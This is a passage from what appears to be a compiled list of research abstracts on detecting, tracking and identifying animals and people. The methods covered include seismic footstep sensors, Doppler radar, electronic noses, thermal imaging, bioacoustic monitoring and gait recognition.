solitary animal is entirely fossorial and apparently communicates with its conspecifics by alternately drumming its hind legs on the burrow floor. Signal production in this species is sexually dimorphic, and mate attraction is likely mediated primarily by seismic signalling between individuals in neighboring burrows. Measurements within, and at various distances away from, natural burrows suggest that seismic signals propagate at least an order of magnitude better than auditory signals. Moreover, using a mechanical thumper which could be triggered from a tape recording of the mole-rat's seismic signals, we established that the vertically-polarized surface wave (Rayleigh wave) propagates with less attenuation than either of the two horizontally-polarized waves. 
Thus, we tentatively hypothesize that Rayleigh waves subserve intraspecific communication in this species. --- paper_title: Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus paper_content: Summary 1. Animals produce sounds for diverse biological functions such as defending territories, attracting mates, deterring predators, navigation, finding food and maintaining contact with members of their social group. Biologists can take advantage of these acoustic behaviours to gain valuable insights into the spatial and temporal scales over which individuals and populations interact. Advances in bioacoustic technology, including the development of autonomous cabled and wireless recording arrays, permit data collection at multiple locations over time. These systems are transforming the way we study individuals and populations of animals and are leading to significant advances in our understandings of the complex interactions between animals and their habitats. 2. Here, we review questions that can be addressed using bioacoustic approaches, by providing a primer on technologies and approaches used to study animals at multiple organizational levels by ecologists, behaviourists and conservation biologists. 3. Spatially dispersed groups of microphones (arrays) enable users to study signal directionality on a small scale or to locate animals and track their movements on a larger scale. 4. Advances in algorithm development can allow users to discriminate among species, sexes, age groups and individuals. 5. With such technology, users can remotely and non-invasively survey populations, describe the soundscape, quantify anthropogenic noise, study species interactions, gain new insights into the social dynamics of sound-producing animals and track the effects of factors such as climate change and habitat fragmentation on phenology and biodiversity. 6. There remain many challenges in the use of acoustic monitoring, including the difficulties in performing signal recognition across taxa. The bioacoustics community should focus on developing a --- paper_title: Acoustic backscattering by deepwater fish measured in situ from a manned submersible paper_content: An outstanding problem in fisheries acoustics is the depth dependence of scattering characteristics of swimbladder-bearing fish, and the effects of pressure on the target strength of physoclistous fish remain unresolved. In situ echoes from deepwater snappers were obtained with a sonar transducer mounted on a manned submersible next to a low-light video camera, permitting simultaneous echo recording and identification of species, fish size and orientation. The sonar system, consisting of a transducer, single board computer, hard disk, and analog-to-digital converter, used an 80 ms broadband signal (bandwidth 35 kHz, center frequency 120 kHz). The observed relationship between fish length and in situ target strength shows no difference from the relationship measured at the surface. No differences in the species-specific temporal echo characteristics were observed between surface and in situ measures. This indicates that the size and shape of the snappers' swimbladders are maintained both at the surface and at depths of up to 250 m. Information obtained through controlled backscatter measurements of tethered, anesthetized fish at the surface can be applied to free-swimming fish at depth.
This is the first published account of the use of a manned submersible to measure in situ scattering from identified, individual animals with known orientations. The distinct advantage of this technique compared with other in situ techniques is the ability to observe the target fish, obtaining accurate species, size, and orientation information. --- paper_title: Application of Bioradiolocation for Estimation of the Laboratory Animals' Movement Activity paper_content: A method for estimating the movement activity of laboratory animals by means of bioradar is proposed. The method could be used during zoo-psychological and pharmacological experiments. Experimental results for different states of the animal are presented, and specific features of the frequency spectra for these states are analyzed. Radiolocation of biological objects, known as bioradiolocation, is an intensively developing area of biomedical engineering. There are several important medical tasks which could be application fields of radiolocation, among them disaster medicine (searching for survivors under the debris and rubble of buildings), monitoring of breathing and heartbeat parameters for burned patients (it would cut down the number of contact sensors used and thus decrease the risk of infection inoculation into burn wounds), sleep apnea diagnostics, and monitoring of breathing and heartbeat parameters for patients who are carriers of extra-hazardous infections (it would decrease the risk of infecting medical staff) (1,2). Besides the above listed fields of application, there is an interest in using bioradiolocation for remote diagnostics of rats and other laboratory animals by estimating their movement activity during zoo-psychological and pharmacological experiments. At present, invasive methods of determining physiological parameters are used when testing medicines and poisonous substances on laboratory animals, and their movement activity is usually estimated visually by the researcher. Another method currently in use for analyzing the behavioural reactions of animals is a specially designed video tracking system, such as Ethovision (3), which can be applied to decrease the workload of the researcher and to automate the estimation of movement activity. The main disadvantage of this type of system is the need for sophisticated software and the restriction on long recordings (durations of more than several hours) because of data storage capacity limitations. That is why, in most cases, the estimation of rats' movement activity is carried out visually by the researcher (4), which may affect the quality of the obtained information. Doppler radar has the advantage of measuring an animal's movement parameters directly, and it can be used to create a fully automatic procedure for integral estimation of movement activity. In this case the amount of data is so small compared to video files that data could be recorded continuously for several days or more. Moreover, provided that special recognition algorithms are created for the radar signals reflected from the animal, it would be possible to discriminate different types of movement (horizontal and vertical activity, grooming, steady state). In that case bioradiolocation can also be applied to the data analysis of open field experiments. Several experiments were carried out to investigate the possibilities of estimating laboratory animals' movement by means of radar.
These experiments and their results are described below. A multi-frequency radar (16 frequencies) with a quadrature receiver, designed at the Remote Sensing Laboratory, was used in the experiments with laboratory rats. --- paper_title: Detection and Classification of Human Body Odor Using an Electronic Nose paper_content: An electronic nose (E-nose) has been designed and equipped with software that can detect and classify human armpit body odor. An array of metal oxide sensors was used for detecting volatile organic compounds. The measurement circuit employs a voltage divider resistor to measure the sensitivity of each sensor. This E-nose was controlled by in-house developed software through a portable USB data acquisition card with a principal component analysis (PCA) algorithm implemented for pattern recognition and classification. Because gas sensor sensitivity in the detection of armpit odor samples is affected by humidity, we propose a new method and algorithms combining hardware/software for the correction of the humidity noise. After the humidity correction, the E-nose showed the capability of detecting human body odor and distinguishing the body odors from two persons in a relative manner. The E-nose is still able to recognize people, even after application of deodorant. In conclusion, this is the first report of the application of an E-nose for armpit odor recognition. --- paper_title: INDIVIDUAL ACOUSTIC IDENTIFICATION AS A NON-INVASIVE CONSERVATION TOOL: AN APPROACH TO THE CONSERVATION OF THE AFRICAN WILD DOG LYCAON PICTUS (TEMMINCK, 1820) paper_content: Individual variation in acoustic signals can be used for discrimination or identification purposes as a valuable supplement to radio-tagging and visual recognition. In this study, 721 hoo-calls from captive and free-ranging African wild dogs Lycaon pictus (n=9) were investigated for individual acoustic cues. The investigation applied a computer-aided sound analysis that allowed measurement of 93 parameters for each hoo-call. Discriminant function analyses demonstrated that the individuals differed in their call parameters primarily measured on the fundamental frequency. Additional discriminant analyses were run in order to find out if individuals can be re-identified once their hoo-calls are recorded and catalogued into a voice library. This procedure yielded an overall 67% correct assignment for the test data (ranging from 37% to 98% per individual), suggesting an above chance level re-recognition of individuals. The results establish the capability of re-identifying wild dogs using specific aco... --- paper_title: Human Activity Classification Based on Micro-Doppler Signatures Using a Support Vector Machine paper_content: The feasibility of classifying different human activities based on micro-Doppler signatures is investigated. Measured data of 12 human subjects performing seven different activities are collected using a Doppler radar. The seven activities include running, walking, walking while holding a stick, crawling, boxing while moving forward, boxing while standing in place, and sitting still. Six features are extracted from the Doppler spectrogram. A support vector machine (SVM) is then trained using the measurement features to classify the activities. A multiclass classification is implemented using a decision-tree structure. Optimal parameters for the SVM are found through a fourfold cross-validation.
The resulting classification accuracy is found to be more than 90%. The potential of classifying human activities over extended time durations, through walls, and at oblique angles with respect to the radar is also investigated and discussed. --- paper_title: SEGMENTING QUADRUPED GAIT PATTERNS FROM WILDLIFE VIDEO paper_content: This paper describes a novel approach to detecting walking quadrupeds in unedited wildlife film footage. Variable lighting, moving backgrounds and camouflaged animals make traditional foreground extraction techniques such as optical flow and background subtraction unstable. We track a sparse set of points over a short film clip and use RANSAC to segment the foreground region. A novel technique, employing normalised convolution, is then utilised to interpolate dense flow from the sparsely defined foreground. Dense flow is extracted for a number of clips demonstrating quadruped gait and other movements. Principal component analysis (PCA) is applied to this set of dense flows and eigenvectors not encapsulating periodic internal motion characteristics are disregarded. The projection coefficients for the remaining principal components are analysed as one dimensional time series. Projection coefficient variation reflects changes in the velocity and relative alignment of the components of the foreground object. These coefficients' relative phase differences are deduced using spectral analysis and degree of periodicity using dynamic time warping. These parameters are used to train a KNN classifier which segments the training data with a 93% success rate. By generating projection coefficients for unseen footage, the system has successfully located examples of quadruped gait previously missed by human observers. --- paper_title: On the Detection of Footsteps Based on Acoustic and Seismic Sensing paper_content: In this work, we present a copula-based framework for integrating signals of different but statistically correlated modalities for binary hypothesis testing problems. Specifically, we consider the problem of detecting the presence of a human using footstep signals from seismic and acoustic sensors. An approach based on canonical correlation analysis and copula theory is employed to establish a likelihood ratio test. Experimental results based on real data are presented. --- paper_title: Application of wireless sensor system on security network paper_content: In this research we developed a wireless sensor system for security applications. We have used a geophone to detect seismic signals generated by footsteps. Geophones are resonant devices. Therefore, vibration on the land can generate seismic waveforms which could be very similar to the signature of a footstep. The signals from human footsteps have a weak signal-to-noise ratio and the signal strength is subject to the distance between the sensor and the human. In order to detect weak signals from footsteps, we designed and fabricated a 2-stage amplification circuit which consists of active and RC filters and amplifiers. The bandwidth of the filter is 0.7 Hz-150 Hz and the gain of the amplifier is set to 1000. A wireless sensor system was also developed to monitor the sensing signals at a remote place. The wireless sensor system consists of 3 units: a wireless sensor unit, a wireless receiver unit, and a monitoring unit.
The wireless sensor unit transmits amplified signals from the geophone with Zigbee, and the wireless receiver unit, which has both Zigbee and Wi-Fi modules, receives signals from the sensor unit and transmits signals to the monitoring system with Zigbee and Wi-Fi, respectively. By using both Zigbee and Wi-Fi, the wireless sensor system can achieve low power consumption and wide range coverage. --- paper_title: Chemical characterization of volatile organic compounds on animal farms paper_content: More than one hundred volatile organic substances were identified by gas chromatography and mass spectrometry (GC/MS) in the indoor and outdoor air, stable and farm road dust and farm soil samples from two pig and cattle farms in the South Moravian Region. Volatile fatty acids (acetic, propanoic, butanoic and pentanoic acids) and their esters dominated along with aldehydes (butanal, pentanal and hexanal) and 4-methylphenol in the indoor and outdoor air samples. Road dust and soil samples contained mainly volatile aromatic compounds (toluene, benzene, ethylbenzene, styrene and xylenes), aliphatic hydrocarbons (largely n-alkanes), dichloromethane and carbon disulphide. The health risks associated with particular volatile compounds detected in the indoor and outdoor samples from the farms need to be assessed. --- paper_title: Synthesis of the pheromone-oriented behavior of silkworm moths by a mobile robot with moth antennae as pheromone sensors paper_content: The authors have studied the emergent mechanism in insect behavior by using a robotic system. Since insects have a simpler nervous system than humans, it is an appropriate model for clarifying the above mechanism. In this study, the pheromone oriented behavior of male silkworm moths was shown by a pheromone-guided mobile robot which had male moth antennae that can detect sex pheromones. This study focuses on the pheromone sensor that used antennae from a living moth. Since the antennae of silkworm moths are very sensitive as compared to artificial gas sensors, they can be used as living gas sensors that can detect pheromone molecules. --- paper_title: Detection of Multiple Heartbeats Using Doppler Radar paper_content: Doppler radar life sensing has shown promise in medical and security applications. The current paper considers the problem of determining the number of persons in a given area (e.g., a room) using the Doppler shift due to heartbeat. The signal is weak and time-varying, and therefore poses a complicated signal processing problem. We develop a generalized likelihood ratio test (GLRT) based on a model of the heartbeat, and show that this can be used to distinguish between the presence of 2, 1, or 0 subjects, even with a single antenna. We further extend this to N antennas. The results show that one can expect to detect up to 2N-1 subjects using this technique. --- paper_title: Physiology-Based Face Recognition in the Thermal Infrared Spectrum paper_content: The current dominant approaches to face recognition rely on facial characteristics that are on or over the skin. Some of these characteristics have low permanency, can be altered, and their phenomenology varies significantly with environmental factors (e.g., lighting). Many methodologies have been developed to address these problems to various degrees. However, the current framework of face recognition research has a potential weakness due to its very nature. We present a novel framework for face recognition based on physiological information.
The motivation behind this effort is to capitalize on the permanency of innate characteristics that are under the skin. To establish feasibility, we propose a specific methodology to capture facial physiological patterns using the bioheat information contained in thermal imagery. First, the algorithm delineates the human face from the background using the Bayesian framework. Then, it localizes the superficial blood vessel network using image morphology. The extracted vascular network produces contour shapes that are characteristic to each individual. The branching points of the skeletonized vascular network are referred to as thermal minutia points (TMPs) and constitute the feature database. To render the method robust to facial pose variations, we collect for each subject to be stored in the database five different pose images (center, midleft profile, left profile, midright profile, and right profile). During the classification stage, the algorithm first estimates the pose of the test image. Then, it matches the local and global TMP structures extracted from the test image with those of the corresponding pose images in the database. We have conducted experiments on a multipose database of thermal facial images collected in our laboratory, as well as on the time-gap database of the University of Notre Dame. The good experimental results show that the proposed methodology has merit, especially with respect to the problem of low permanence over time. More importantly, the results demonstrate the feasibility of the physiological framework in face recognition and open the way for further methodological and experimental research in the area --- paper_title: METHODOLOGICAL INSIGHTS: Using seismic sensors to detect elephants and other large mammals: a potential census technique paper_content: Summary 1. Large mammal populations are difficult to census and monitor in remote areas. In particular, elephant populations in Central Africa are difficult to census due to dense forest, making aerial surveys impractical. Conservation management would be improved by a census technique that was accurate and precise, did not require large efforts in the field, and could record numbers of animals over a period of time. 2. We report a new detection technique that relies on sensing the footfalls of large mammals. A single geophone was used to record the footfalls of elephants and other large mammal species at a waterhole in Etosha National Park, Namibia. 3. Temporal patterning of footfalls is evident for some species, but this pattern is lost when there is more than one individual present. 4. We were able to discriminate between species using the spectral content of their footfalls with an 82% accuracy rate. 5. An estimate of the energy created by passing elephants (the area under the amplitude envelope) can be used to estimate the number of elephants passing the geophone. Our best regression line explained 55% of the variance in the data. This could be improved upon by using an array of geophones. 6. Synthesis and applications. This technique, when calibrated to specific sites, could be used to census elephants and other large terrestrial species that are difficult to count. It could also be used to monitor the temporal use of restricted resources, such as remote waterholes, by large terrestrial species. --- paper_title: Object tracking: A survey paper_content: The goal of this article is to review the state-of-the-art tracking methods, classify them into different categories, and identify new trends. 
Object tracking, in general, is a challenging problem. Difficulties in tracking objects can arise due to abrupt object motion, changing appearance patterns of both the object and the scene, nonrigid object structures, object-to-object and object-to-scene occlusions, and camera motion. Tracking is usually performed in the context of higher-level applications that require the location and/or shape of the object in every frame. Typically, assumptions are made to constrain the tracking problem in the context of a particular application. In this survey, we categorize the tracking methods on the basis of the object and motion representations used, provide detailed descriptions of representative methods in each category, and examine their pros and cons. Moreover, we discuss the important issues related to tracking including the use of appropriate image features, selection of motion models, and detection of objects. --- paper_title: Automatic identification of bird targets with radar via patterns produced by wing flapping paper_content: Bird identification with radar is important for bird migration research, environmental impact assessments (e.g. wind farms), aircraft security and radar meteorology. In a study on bird migration, radar signals from birds, insects and ground clutter were recorded. Signals from birds show a typical pattern due to wing flapping. The data were labelled by experts into the four classes BIRD, INSECT, CLUTTER and UFO (unidentifiable signals). We present a classification algorithm aimed at automatic recognition of bird targets. Variables related to signal intensity and wing flapping pattern were extracted (via continuous wavelet transform). We used support vector classifiers to build predictive models. We estimated classification performance via cross validation on four datasets. When data from the same dataset were used for training and testing the classifier, the classification performance was extremely to moderately high. When data from one dataset were used for training and the three remaining datasets were used as test sets, the performance was lower but still extremely to moderately high. This shows that the method generalizes well across different locations or times. Our method provides a substantial gain of time when birds must be identified in large collections of radar signals and it represents the first substantial step in developing a real time bird identification radar system. We provide some guidelines and ideas for future research. --- paper_title: Survey of gait recognition paper_content: Gait recognition, the process of identifying an individual by his /her walking style, is a relatively new research area. It has been receiving wide attention in the computer vision community. In this paper, a comprehensive survey of video based gait recognition approaches is presented. And the research challenges and future directions of the gait recognition are also discussed. --- paper_title: Footstep classification using wavelet decomposition paper_content: The characteristics of human footsteps are determined by the gait, the footwear and the floor. Accurate footstep analysis would be useful in various applications, home security service, surveillance and understanding of human action since the gait expresses personality, age and gender. 
The feasibility of personal identification has been confirmed by using the feature parameter of footsteps, however, it is necessary to use more effective parameters since the recognition rate of this method decreases as the number of subjects increases. In audio classification, Fourier and wavelet transform were used to extract the feature of audio signals. The feasibility of a footstep classification using Fourier and wavelet parameters were confirmed previously. In this paper, we focused on the wavelet parameter which consists of subband power, time-brightness and time-width. Previous work shows that the feature extraction using wavelet transform is effective for footstep categorizations, however, an optimal frame length for feature extraction and the relationship between a recognition rate and the length of feature parameters are not discussed in that paper. This paper provides two dominant results; the frame window size, which yield the good accuracy for footstep classification, is 4096; the feature parameter based on wavelet parameters can be reduced to 2/3 with equivalent recognition rate. Results show that the parameter applied herein yields effective and practical footstep classification. --- paper_title: Normal variation in thermal radiated temperature in cattle: implications for foot-and-mouth disease detection paper_content: BackgroundThermal imagers have been used in a number of disciplines to record animal surface temperatures and as a result detect temperature distributions and abnormalities requiring a particular course of action. Some work, with animals infected with foot-and-mouth disease virus, has suggested that the technique might be used to identify animals in the early stages of disease. In this study, images of 19 healthy cattle have been taken over an extended period to determine hoof and especially coronary band temperatures (a common site for the development of FMD lesions) and eye temperatures (as a surrogate for core body temperature) and to examine how these vary with time and ambient conditions.ResultsThe results showed that under UK conditions an animal's hoof temperature varied from 10°C to 36°C and was primarily influenced by the ambient temperature and the animal's activity immediately prior to measurement. Eye temperatures were not affected by ambient temperature and are a useful indicator of core body temperature.ConclusionsGiven the variation in temperature of the hooves of normal animals under various environmental conditions the use of a single threshold hoof temperature will be at best a modest predictive indicator of early FMD, even if ambient temperature is factored into the evaluation. --- paper_title: Analysis of human footsteps utilizing multi-axial seismic fusion paper_content: This paper introduces a method of enhancing an unattended ground sensor (UGS) system's classification capability of humans via seismic signatures while subsequently discriminating these events from a range of other sources of seismic activity. Previous studies have been performed to consistently discriminate between human and animal signatures using cadence analysis. The studies performed herein will expand upon this methodology by improving both the success rate of such methods as well as the effective range of classification. This is accomplished by fusing multiple seismic axes in real-time to separate impulsive events from environmental noise. 
Additionally, features can be extracted from the fused axes to gather more advanced information about the source of a seismic event. Compared to more basic cadence determination algorithms, the proposed method substantially improves the detection range and correct classification of humans and significantly decreases false classifications due to animals and ambient conditions. --- paper_title: What you see is not what you get: the role of ultrasonic detectors in increasing inventory completeness in Neotropical bat assemblages paper_content: Summary 1. Microchiropteran bats have the potential to be important biodiversity indicator species as they are distributed globally and are important in ecosystem functioning. Survey and monitoring protocols for bats are often ineffective as sampling techniques vary in their efficacy depending on the species involved and habitats surveyed. Acoustic sampling using bat detectors may prove an alternative or complementary technique to capture methods but is largely untested in the tropics. 2. To compare the efficacy of bat detectors and capture methods in surveys, we used ground mist nets, sub-canopy mist nets and harp traps to sample bats while simultaneously recording the echolocation calls of insectivorous bats in a diversity of habitats in the Yucatan, Mexico. We described echolocation calls, analysed call characteristics to identify species, and compared species inventories derived from traditional capture methods with those derived from acoustic sampling. 3. A total of 2819 bats representing 26 species and six families were captured; 83% were captured in ground nets, 13% in sub-canopy nets and 4% in harp traps. Fourteen species and five phonic types were identified based on five echolocation call characteristics. Discriminant function analysis showed a high level of correct classification of the calls (84·1%), indicating that identification of species by their echolocation calls is feasible. 4. In all habitats, acoustic sampling and capture methods sampled significantly more species each night than capture methods alone. Capture methods failed to sample 30% of the bat fauna, and aerial insectivores were sampled only by bat detectors. 5. Synthesis and applications . Given the importance of bats in ecosystem functioning, and their potential as indicator species, developing effective methodologies to survey and monitor bats is important for sustainable forest management and biodiversity conservation. Acoustic sampling should be used with capture methods to increase inventory completeness in bat assemblage studies, and could form part of a single standardized monitoring protocol that can be used globally in tropical forests, as this method detects aerial insectivores not sampled by capture methods. --- paper_title: Assessing the Use of Call Surveys to Monitor Breeding Anurans in Rhode Island paper_content: Our objective was to develop a long-term monitoring program that quantified anuran population trends in Rhode Island. Because road-based, manual call surveys are widely used in North America to monitor anurans, we assessed the efficacy of using this method to monitor the impact of anthropogenic change of anuran populations in the state. We quantified interspecific variation in calling chronology, calling frequency, and calling intensity at 31 breeding ponds in southern Rhode Island in 1998. Four distinct sampling periods were needed to monitor the seven species we detected. 
During a species' peak sampling period, males of some species called only sporadically within our 16-min surveys, such as pickerel frogs (Rana palustris), whereas other species called continually [spring peepers (Pseudacris crucifer) and green frogs (Rana clamitans)]. Based on accumulation curves, we suggest that call surveys in Rhode Island be conducted for 10-min at breeding ponds to have a high probability of detecting all species. Assuming we conduct one call survey annually during the four sampling periods, a power analysis estimated that we need to conduct 283 or 690 10-min surveys annually to detect 10% or 5% annual declines, respectively, to monitor most anurans in Rhode Island. Common species that are widespread and call frequently could be monitored with road-based call surveys. However, rarer species or those that call infrequently would be difficult to monitor with call surveys in Rhode Island; therefore other monitoring methods might be more appropriate. --- paper_title: Territorial dynamics of Mexican Ant-thrushes Formicarius moniliger revealed by individual recognition of their songs paper_content: The ability to monitor interactions between individuals over time can provide us with information on life histories, mating systems, behavioural interactions between individuals and ecological interactions with the environment. Tracking individuals over time has traditionally been a time- and often a cost-intensive exercise, and certain types of animals are particularly hard to monitor. Here we use canonical discriminant analysis (CDA) to identify individual Mexican Ant-thrushes using data extracted with a semi-automated procedure from song recordings. We test the ability of CDA to identify individuals over time, using recordings obtained over a 4-year period. CDA correctly identified songs of 12 individual birds 93.3% of the time from recordings in one year (2009), while including songs of 18 individuals as training data. Predicting singers in one year using recordings from other years indicated some instances of variation, with correct classification in the range of 67–88%; one individual was responsible for the great majority (66%) of classification errors. We produce temporal maps of the study plot showing that considerably more information was provided by identifying individuals from their songs than by ringing and re-sighting colour-ringed individuals. The spatial data show site fidelity in males, but medium-term pair bonds and an apparently large number of female floaters. Recordings can be used to monitor intra- and intersexual interactions of animals, their movements over time, their interactions with the environment and their population dynamics. --- paper_title: Tracking multiple animals in wildlife footage paper_content: We describe a method for tracking animals in wildlife footage. It uses a CONDENSATION particle filtering frame-work driven by learnt characteristics of specific animals. The key contribution is a periodic model of animal motion based on the relative positions over time of trackable features at significant body points. We also introduce techniques for maintaining a multimodal state density within the particle filter over time to enable consistent tracking of multiple animals. Initial experiments show that the approach has considerable potential. 
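The CONDENSATION tracker summarised in the preceding abstract is a particle filter. As a rough, illustrative sketch of the underlying predict-weight-resample loop (not the authors' implementation; a simple constant-velocity model stands in for their learnt periodic gait model, and all parameter values are assumptions):

import numpy as np

rng = np.random.default_rng(0)

def particle_filter_step(particles, weights, observation, motion_std=1.0, obs_std=2.0):
    # Predict: propagate each particle with a constant-velocity motion model plus noise.
    particles[:, 0] += particles[:, 1] + rng.normal(0.0, motion_std, len(particles))
    # Update: weight each particle by the likelihood of the observed position.
    likelihood = np.exp(-0.5 * ((observation - particles[:, 0]) / obs_std) ** 2)
    weights = weights * likelihood
    weights /= weights.sum()
    # Resample when the effective sample size collapses, keeping the density non-degenerate.
    if 1.0 / np.sum(weights ** 2) < 0.5 * len(particles):
        idx = rng.choice(len(particles), size=len(particles), p=weights)
        particles, weights = particles[idx], np.full(len(particles), 1.0 / len(particles))
    return particles, weights

# Toy usage: track a 1-D position from noisy measurements.
particles = np.column_stack([rng.normal(0, 5, 500), rng.normal(0, 1, 500)])  # [position, velocity]
weights = np.full(500, 1.0 / 500)
for z in [1.0, 2.2, 2.9, 4.1]:
    particles, weights = particle_filter_step(particles, weights, z)
print(np.average(particles[:, 0], weights=weights))

Keeping a weighted particle set rather than a single Gaussian estimate is what allows the state density to remain multimodal when several animals or ambiguous observations are present.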
--- paper_title: New seismic unattended small size module for footstep and light and heavy vehicles detection and identification paper_content: General Sensing Systems (GSS) has developed a new seismic, unattended small size module that detects and identifies not only human footsteps but also light and heavy vehicles with near zero false alarm rates. This module has extremely low power consumption and can operate for several months using standard commercial batteries. This paper describes the design of this module that can communicate with any radio transducer or computer. We also report on the preliminary lab and field testing that was implemented in various environment conditions. We show that the new unattended, small size detection module demonstrates the same reliable performance as our previous footstep detection systems and has the added capability of detecting and identifying light and heavy vehicles. --- paper_title: Biometric animal databases from field photographs: identification of individual zebra in the wild paper_content: We describe an algorithmic and experimental approach to a fundamental problem in field ecology: computer-assisted individual animal identification. We use a database of noisy photographs taken in the wild to build a biometric database of individual animals differentiated by their coat markings. A new image of an unknown animal can then be queried by its coat markings against the database to determine if the animal has been observed and identified before. Our algorithm, called StripeCodes, efficiently extracts simple image features and uses a dynamic programming algorithm to compare images. We test its accuracy against two different classes of methods: Eigenface, which is based on algebraic techniques, and matching multi-scale histograms of differential image features, an approach from signal processing. StripeCodes performs better than all competing methods for our dataset, and scales well with database size. --- paper_title: Bird migration flight altitudes studied by a network of operational weather radars paper_content: A fully automated method for the detection and quantification of bird migration was developed for operational C-band weather radar, measuring bird density, speed and direction as a function of altitude. These weather radar bird observations have been validated with data from a high-accuracy dedicated bird radar, which was stationed in the measurement volume of weather radar sites in The Netherlands, Belgium and France for a full migration season during autumn 2007 and spring 2008. We show that weather radar can extract near real-time bird density altitude profiles that closely correspond to the density profiles measured by dedicated bird radar. Doppler weather radar can thus be used as a reliable sensor for quantifying bird densities aloft in an operational setting, which—when extended to multiple radars—enables the mapping and continuous monitoring of bird migration flyways. By applying the automated method to a network of weather radars, we observed how mesoscale variability in weather conditions structured the timing and altitude profile of bird migration within single nights. Bird density altitude profiles were observed that consisted of multiple layers, which could be explained from the distinct wind conditions at different take-off sites. 
Consistently lower bird densities are recorded in The Netherlands compared with sites in France and eastern Belgium, which reveals some of the spatial extent of the dominant Scandinavian flyway over continental Europe. --- paper_title: Application of remote thermal imaging and night vision technology to improve endangered wildlife resource management with minimal animal distress and hazard to humans paper_content: Advanced electromagnetic sensor systems more commonly associated with the hightech military battlefield may be applied to remote surveillance of wildlife. The first comprehensive study of a wide global variety of Near Infra Red (NIR) and thermal wildlife portraits are presented with this technology: for mammals, birds and other animals. The paper illustrates the safety aspects afforded to zoo staff and personnel in the wild during the day and night from potentially lethal and aggressive animals, and those difficult to approach normally. Such remote sensing systems are non-invasive and provide minimal disruption and distress to animals both in captivity and in the wild. We present some of the veterinarian advantages of such all weather day and night systems to identify sickness and injuries at an early diagnostic stage, as well as age related effects and mammalian cancer. Animals have very different textured surfaces, reflective and emissive properties in the NIR and thermal bands than when compared with the visible spectrum. Some surface features may offer biomimetic materials design advantages. --- paper_title: Evaluation of unpleasant odor with a portable electronic nose paper_content: An intelligent multi-sensor system with an entire autonomy, a low weight and a small size has been developed for in situ applications such as environmental pollutant gas detection or olfactory estimation. This portable electronic nose works with commercial metal oxide gas sensors and a microcontroller connected to a compact flash memory as intelligent unit. In this work we present the conception of this electronic nose, its laboratory validation, and a real application which concerns an outdoor air monitoring of a duck breeding. This application is developed in order to quantify continuously discomfort odor spread, causing neighbor complaints. The odor measurements were made using our electronic nose (Nepo) and results are compared to the simultaneous results obtained from other olfactometric techniques. --- paper_title: A line in the sand: A wireless sensor network for target detection, classification, and tracking paper_content: Intrusion detection is a surveillance problem of practical import that is well suited to wireless sensor networks. In this paper, we study the application of sensor networks to the intrusion detection problem and the related problems of classifying and tracking targets. Our approach is based on a dense, distributed, wireless network of multi-modal resource-poor sensors combined into loosely coherent sensor arrays that perform in situ detection, estimation, compression, and exfiltration. We ground our study in the context of a security scenario called "A Line in the Sand" and accordingly define the target, system, environment, and fault models. Based on the performance requirements of the scenario and the sensing, communication, energy, and computation ability of the sensor network, we explore the design space of sensors, signal processing algorithms, communications, networking, and middleware services. 
We introduce the influence field, which can be estimated from a network of binary sensors, as the basis for a novel classifier. A contribution of our work is that we do not assume a reliable network; on the contrary, we quantitatively analyze the effects of network unreliability on application performance. Our work includes multiple experimental deployments of over 90 sensor nodes at MacDill Air Force Base in Tampa, FL, as well as other field experiments of comparable scale. Based on these experiences, we identify a set of key lessons and articulate a few of the challenges facing extreme scaling to tens or hundreds of thousands of sensor nodes. --- paper_title: Cadence analysis of temporal gait patterns for seismic discrimination between human and quadruped footsteps paper_content: This paper reports on a method of cadence analysis for the discrimination between human and quadruped using a cheap seismic sensor. Previous works in the domain of seismic detection of human vs. quadruped have relied on the fundamental gait frequency. Slow movement of quadrupeds can generate the same fundamental gait frequency as human footsteps therefore causing the recognizer to be confused when quadruped are ambling around the sensor. Here we propose utilizing the cadence analysis of temporal gait pattern which provides information on temporal distribution of the gait beats. We also propose a robust method of extracting temporal gait patterns. Features extracted from gait patterns are modeled with optimum number of Gaussian Mixture Models (GMMs). The performance of the system during the test for discriminating between horse, dog, multiple people walk, and single human walk/run was over 95%. --- paper_title: The Cow Gait Recognition Using CHLAC paper_content: This paper reports the preliminary experiments on the cow identification via gait recognition of motion images. The eight cows walking under two different situations have been precisely identified by Cubic Higher-order Local Auto-Correlation (CHLAC). The cow gait recognition using CHLAC is expected to be a landmark achievement for realizing cost-effective dairy cattle breeding management systems which do not use any sensors and hormone in order to determine the timing of artificial insemination in dairy cattle. --- paper_title: Improved human detection and classification in thermal images paper_content: We present a new method for detecting pedestrians in thermal images. The method is based on the Shape Context Descriptor (SCD) with the Adaboost cascade classifier framework. Compared with standard optical images, thermal imaging cameras offer a clear advantage for night-time video surveillance. It is robust on the light changes in day-time. Experiments show that shape context features with boosting classification provide a significant improvement on human detection in thermal images. In this work, we have also compared our proposed method with rectangle features on the public dataset of thermal imagery [1]. Results show that shape context features are much better than the conventional rectangular features on this task. --- paper_title: Insect pheromones. paper_content: The evidence for intraspecies chemical communication in insects is reviewed, with emphasis on those studies where known organic compounds have been implicated. These signal-carrying chemicals are known as pheromones. There are two distinct types of pheromones, releasers and primers. 
Releaser pheromones initiate immediate behavioral responses in insects upon reception, while primer pheromones cause physiological changes in an animal that ultimately result in a behavior response. Chemically identified releaser pheromones are of three basic types: those which cause sexual attraction, alarm behavior, and recruitment. Sex pheromones release the entire repertoire of sexual behavior. Thus a male insect may be attracted to and attempt to copulate with an inanimate object that has sex pheromone on it. It appears that most insects are rather sensitive and selective for the sex pheromone of their species. Insects show far less sensitivity and chemospecificity for alarm pheromones. Alarm selectivity is based more on volatility than on unique structural features. Recruiting pheromones are used primarily in marking trails to food sources. Terrestrial insects lay continuous odor trails, whereas bees and other airborne insects apply the substances at discrete intervals. It appears that a complex pheromone system is used by the queen bee in the control of worker behavior. One well-established component of this system is a fatty acid, 9-ketodecenoic acid, produced by the queen and distributed among the workers. This compound prevents the development of ovaries in the workers and inhibits their queen-rearing activities. In addition, the same compound is used by virgin queen bees as a sex attractant. --- paper_title: Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus paper_content: Summary 1. Animals produce sounds for diverse biological functions such as defending territories, attracting mates, deterring predators, navigation, finding food and maintaining contact with members of their social group. Biologists can take advantage of these acoustic behaviours to gain valuable insights into the spatial and temporal scales over which individuals and populations interact. Advances in bioacoustic technology, including the development of autonomous cabled and wireless recording arrays, permit data collection at multiple locations over time. These systems are transforming the way we study individuals and populations of animals and are leading to significant advances in our understandings of the complex interactions between animals and their habitats. 2. Here, we review questions that can be addressed using bioacoustic approaches, by providing a primer on technologies and approaches used to study animals at multiple 